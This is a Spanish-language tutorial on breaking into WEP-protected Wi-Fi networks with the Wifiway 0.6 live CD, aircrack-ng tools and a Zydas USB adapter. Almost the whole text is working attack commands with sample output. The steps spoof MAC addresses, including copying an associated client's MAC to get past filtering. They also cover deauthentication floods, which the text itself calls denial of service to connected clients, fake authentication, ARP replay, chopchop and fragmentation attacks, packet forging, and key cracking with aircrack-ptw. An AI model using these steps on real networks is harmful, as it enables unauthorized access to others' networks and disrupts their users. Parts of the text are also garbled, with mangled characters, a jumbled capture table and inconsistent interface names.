Primero grabar el archivo wifiway-0.6.iso con la opcin Grabar imagen en disco desde el Nero en u CD.

Luego reiniciar el CD desde el ordenador directamente sin iniciar Windows . La bios la tienes que configurar para que reinicie el ordenador directamente desde el CD.

Manual wifiway 0.6 y USB Zydas 1211b+g

Arrancamos el LiveCD,cuando aparezca un cuadro con la palabra GMT

Pulsamos enter, nos sale <LOCALTIME>

Pulsamos enter, sale un cuadro para el idioma, buscamos con el tabulador (las flechas del teclado) SPANIS ISO 8859-1

Pulsamos enter, En el siguiente

Volvemos a pulsar enter En la siguiente pantalla tecleamos la palabra startx

Empieza a cargarse el programa y sale la pantalla inicial.

Conectamos la USB al PC. USB Wireless 54Mbps 802.11g Chipset Zydas + Conector Antena RP-SMA (Modo monitor solo en Linux)

Paso-1/1
Abrimos un terminal y tecleamos: iwconfig Localizo donde aparece mi USB (en este caso es eth2)En todos los pasos de este tutorial donde aparece eth2 cada cual que escriba el sitio donde aparezca su tarjeta, bien sea < lo >,< eth >,< eth1 > < eth2 > lo no wireless extensions eth no wireless extensions eth1 no wireless extensions eth2 EEE 802.11b/g ESSID: pf/any NIckname : "zd1211b" Encryption key :of Link Quality:0 Signel level:0 Noise level:0 Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon: 0 Si no os aparece nada sobre buestra usb tarjeta, es que esta down y hay que ponerla up y se pone con el siguiente comando: ifconfig eth2 up

Paso-2

Abrimos otro terminal y tecleamos: macchanger -m 00:la:ma:ck:es:ea eth2 Esto es para cambiar nuestra MAC. Ahora nuestra MAC aparecer con la numeracin que hemos metido 00:la:ma:ck:es:ea

Paso-1/2
Volvemos al terminal del Paso-1 y es aqu donde entra en accin airodump-ng . Tecleamos: airodump-ng eth2 Una vez aparezcan los BSSID que captamos con nuestra tarjeta, anotamos el que nos interesa ( siempre que sea wep) pulsamos CTRL+C para parar el proceso. Ejemplo de lo que nos muestra airodump-ng. Nota:

Las MACs que se muestran son un ejemplo y no son reales.

CH 9] [Elapsed: 4 s] [2007-02-25 16:47 BSSID 00:01:5:1L:AS:9D 00:14:0C:9A:31:88 BSSID 00:14:0C:9A:31:88 (not associated) 00:14:0C:9A:31:88 PWR RXQ 11 16 34 100 STATION 00:0F:6:J3:L6:69 00:14:A4:3F:8D:13 00:0R:4P:52:CT:D3 Beacons 10 57 PWR 51 19 -1 #Data, #/s 0 14 Lost 2 0 0 0 1 CH 11 6 MB 54. 11 ENC OPN WEP Probes mossy CIPHER AUTH ESSID WEP NETGEAR bigbear

Packets 14 4 5

Podemos observar que en el canal (CH) 6 aparece una BSSID con encriptacin WEP y debajo aparece con dos clientes asociados (00:0F:6:J3:L6:69 y 00:0R:4P:52:CT:D3).

Paso-1/3
En la misma terminal tecleamos: airodump-ng -c 6 -w (nombre del archivo) eth2 Donde nombre del archivo, se le da nombre al archivo que se crea donde se guardaran las capturas de los #Data. Con este comando a la vez que creamos el archivo de capturas, airodump-ng nos mostrara nicamente los APs que se encuentren en el canal 6(CH). Aqu nos tenemos que fijar bien si la MAC con encriptacin WEP esta con algn cliente asociado no, para proceder con los ataques de una forma u otra.

Paso-3/1

Abrimos otra terminal Aqu entra en accin aireplay-ng En caso de no tener ningun cliente asociado, tenemos varias opciones para atacar un AP WEP, pero ojo LOS ATAKES DE INYECCION SIN CLIENTES SUELEN TARDAR BASTANTE TIEMPO EN EMPEZAR (A VECES SOLO 10 MINUTOS o A VECES 2 HORAS O MAS) Y SUELE SER NECESARIO VARIOS INTENTOS. NO PENSEIS QUE ES INMEDIATO COMO CUANDO HAY CLIENTES. Y SOBRE TODO DEPENDE DEL MODELO DE ROUTER!!!!!! HAY MUCHOS DE LOS QUE SON NUEVOS QUE YA ESTAN PROTEGIDOS CONTRA LA INYECCION SIN CLIENTES.

Se pueden realizar 5 ataques diferentes:

Ataque 0: Desautentificacin Ataque 1: Autentificacin falsa Ataque 2: Seleccin interactiva del paquete a enviar Ataque 3: Reinyeccin de peticin ARP Ataque 4: El "chopchop" de KoreK (prediccin de CRC) Ataque 0: Desautentificacin Este ataque se puede utilizar para varios propsitos: *Capturar el WPA Handshake Para ello debemos poner el siguiente comando: aireplay-ng -0 5 -a 00:14:0C:9A:31:88 -c 00:0F:6:J3:L6:69 eth2 0 significa desautentificacin de cliente sirve para que se vuelva a asociar, vaciando de esta forma el cache ARP y por lo tanto volviendo a enviar su handshake. -a 00:14:0C:9A:31:88 Seria el AP -c 00:0F:6:J3:L6:69 Seria una Station asociada a esa AP. Si omitimos esta ltima parte el ataque se realiza sobre todos las Station conectadas a ese AP. eth2 Es nuestra tarjeta segn los diversos modelos de tarjeta (chip) varia wlan0, eth0, ra0.... *Reinyeccin ARP aireplay-ng -0 10 -a 00:14:0C:9A:31:88 ath2 aireplay-ng -3 -b 00:14:0C:9A:31:88 -h 00:0F:6:J3:L6:69 eth2 como podemos observar el primer comando es una desautentificacin seguida de una reinyeccin de los paquetes obtenidos se supone que al haber vaciado la cache del cliente y volverse a conectar vuelve a enviar la contrasea

-b 00:14:0C:9A:31:88 Seria el AP -h 00:0F:6:J3:L6:69 Seria el cliente *Denegacin del servicio a clientes conectados Se basa en el envi continuo de paquetes de desautentificacin con la consiguiente imposibilidad del(os) cliente(s) de conectarse. aireplay-ng -0 0 -a 00:14:0C:9A:31:88 eth2 0 hace que envi paquetes continuamente a cualquier Station conectado a ese AP si solo queremos uno en particular enviaramos con el comando: aireplay-ng -0 0 -a 00:14:0C:9A:31:88 -c 00:0F:6:J3:L6:69 eth2

Ataque 1: Autentificacin falsa Este ataque es solamente exitoso cuando necesitamos un cliente asociado al AP para realizar los ataques 2, 3, 4 (-h opcin) y no lo tenemos. Por lo tanto consiste en crear nosotros mismos un cliente que se asociara a ese AP .Hay que recordar llegando a este punto que siempre ser mejor un cliente verdadero ya que el falso no genera trafico ARP. Con el siguiente comando nos Asociamos. Tecleamos:
aireplay-ng -1 0 -e WLAN_61 -a XX:XX:XX:XX:XX:XX -h 00:la:ma:ck:es:ea eth2

Si el nivel de seal no es relativamente bueno, no asocia. Es cuestin de mover la antena o el usb viendo dnde coge mejor la seal que te interese, y de tener paciencia. Puedes probar la opcin -o. A veces funciona mejor:
aireplay-ng -1 30 -o 1 -e WLAN_61 -a XX:XX:XX:XX:XX:XX -h 00:la:ma:ck:es:ea eth2

Vers que despus de esto: 12:14:06 Sending Authentication Request 12:14:06 Authentication successful 12:14:06 Sending Association Request 12:14:07 Association successful :-) En lugar de pararse, cada 30 segundos enva otro mensaje y as se mantiene autentificado si en vez de 30 segundos queremos 20 pues escribimos 20 si fuesen 10 modificamos por 10 y asi sucesivamente. Ataque 2: Seleccin interactiva del paquete a enviar Este ataque te permite elegir un paquete dado para reenviarlo; a veces proporciona resultados ms efectivos que el ataque 3 (reinyeccin automtica de ARP).

Podras usarlo, por ejemplo, para intentar el ataque "redifundir cualesquiera datos", el cul slo funciona si el AP realmente reencripta los paquetes de datos WEP:
aireplay-ng -2 -b 00:13:10:30:24:9C -n 100 -p 0841 -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath2

Tambin puedes usar el ataque 2 para reenviar manualmente paquetes de peticiones ARP encriptadas con WEP, cuyo tamao es bien 68 o 86 bytes (dependiendo del sistema operativo):
aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath2 aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath2

Otra buena idea es capturar una cierta cantidad de trfico y echarle un ojo con ethereal. Si creemos al examinar el trafico que hay dos paquetes que parecen una peticin y una respuesta (Un cliente enva un paquete y poco despus el destinatario responde a este) entonces es una buena idea intentar reinyectar el paquete peticin para obtener paquetes respuestas. Ataque 3: Reinyeccin de peticin ARP *Con un cliente asociado. En la captura de arriba se puede observar la MAC (00:14:0C:9A:31:88) con dos clientes asociados (00:0F:6:J3:L6:69 y 00:0R:4P:52:CT:D3). Esta vez con el ataque -3 nos tendra que valer, sin necesidad de asociarnos (ataque -1). Pero antes en otra terminal debemos de cambiar nuestra MAC por la del cliente asociado ejem: macchanger -m 00:0F:6:J3:L6:69 eth2 Despus del cambio, en otra terminal, este comando ser suficiente: aireplay-ng -3 -b(mac del AP) -h(mac del AP asociado) eth2 Siguiendo con el ejemplo, el comando seria el siguiente: aireplay-ng -3 b 00:14:0C:9A:31:88 h 00:0F:6:J3:L6:69 eth2 Y saldra en el terminal la siguiente informacin: Saving ARP requests in replay_arp-0627-121526.cap You must also start airodump to capture replies. Read 2493 packets (got 1 ARP requests), sent 1305 packets... Esperamos y en breve los ARP empiezan a moverse y los #datas en airodup-ng empezaran a subir. *Sin clientes asociados. Si no hay clientes conectados en ese momento, entonces s que no queda ms remedio que utilizar el ataque de autentificacin (aireplay-ng -1....) antes del -3, osease: En un terminal hacemos este Ataque 1: Autentificacin falsa

aireplay-ng -1 10 -e WLAN_61 -b XX:XX:XX:XX:XX:XX

-h 00:la:ma:ck:es:ea eth2

En otro terminal hacemos este otro Ataque 3: Reinyeccin de peticin ARP

aireplay-ng -3 -b XX:XX:XX:XX:XX:XX

-h 00:la:ma:ck:es:ea eth2

Estos ataques no siempre funcionan, os recomiendo que tengais paciencia Que tampoco funciona, podemos probar con otro tipo de ataques.

Ataque 4: El "chopchop" de KoreK (prediccin de CRC) Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin conocer la clave. Incluso puede funcionar con WEP dinmica. Este ataque no recupera la clave WEP en s misma, sino que revela meramente el texto plano. De cualquier modo, la mayora de los puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer vulnerables pero en realidad tiran los paquetes menores de 60 bytes. Si el AP tira paquetes menores de 42 bytes aireplay trata de adivinar el resto de la informacin que le falta, tan pronto como el encabezado se predecible. Si un paquete IP es capturado automticamente busca el checksum del encabezado despus de haber adivinado las partes que le faltaban. Este ataque requiere como mnimo un paquete WEP (encriptado). 1. Primero, desencriptemos un paquete: aireplay-ng -4 ath2 Si esto falla, es debido a que hay veces que el AP tira la informacin porque no sabe de que direccin MAC proviene. En estos casos debemos usar la direccin MAC de un cliente que este conectado y que tenga permiso (filtrado MAC activado). aireplay-ng -4 -h 00:09:5B:EB:C5:2B ath0 2. Echemos un vistazo a la direccin IP: tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap reading from file replay_dec-0627-022301.cap, link-type [...] IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1 3. Ahora, forjemos una peticin ARP. La IP inicial no importa (192.168.1.100), pero la Ip de destino (192.168.1.2) debe responder a peticiones ARP. La direccin MAC inicial debe corresponder a una estacin asociada.

arpforge-ng replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap

4. Y reenviemos nuestra peticin ARP forjada: aireplay-ng -2 -r arp.cap ath0 Ataque -5: parecido a chop-chop aireplay-ng -5 -b XX:XX:XX:XX:XX:XX -h 00:la:ma:ck:es:ea eth2 (igual que con el ataque -3, si hay un cliente real es mejor utilizar su MAC en lugar de 00:11:22:33:44:55) (con XX:XX:XX:XX:XX:XX me refiero siempre a la mac del ap, o sea al bssid de la red que te interesa) Cuando pregunte: "Use this packet ?" le das "y" (yes) Si todo sale bien, tras un rato (que puede ser largo) obtendrs algo como esto: Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-1234-123456.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream y se te crear un archivo con un nombre parecido a fragment-1234-123456.xor (digo parecido porque los nmeros cambian) Luego escribes: packetforge-ng -0 -a XX:XX:XX:XX:XX:XX -h 00:la:ma:ck:es:ea -k 255.255.255.255 -l 255.255.255.255 -y fragment-1234-123456.xor -w nombre.cap Esto te crear un fichero llamado "nombre.cap" (puedes poner el nombre que quieras, claro) (por supuesto no debes poner fragment-1234-123456.xor tal cual, sino el que te haya creado a t el aireplayng, que tendr otros nmeros, esto es slo un ejemplo y que dicho fichero lo tendrs en: sistema / root/ tendrs el fichero en formato .xor) Y por ltimo: aireplay-ng -2 -r nombre.cap eth2 y cuando te pregunte, le das "y" otra vez. Hecho esto los paquetes(#Data) en la terminal donde tenemos al airodump debern de empezar a subir para el Access Point elegido.Esperamos a que junte un mnimo de 30,000 #Data. Cuando este por encima de ese valor, ejecutamos :

Paso-5

aircrack-ptw tako-01.cap

En unos instantes te deber aparecer la clave, en el rengln que diga Found Key. Si no aparece espera a que junte ms paquetes y vuelve a ejecutar este ltimo comando. Puede llegar a requerir hasta 100,000 o ms.

(El orden sera.... 1 localizar el USB; 2 cambio de MAC; 3 airodump-ng, 4 aireplayng, 5 aircrack)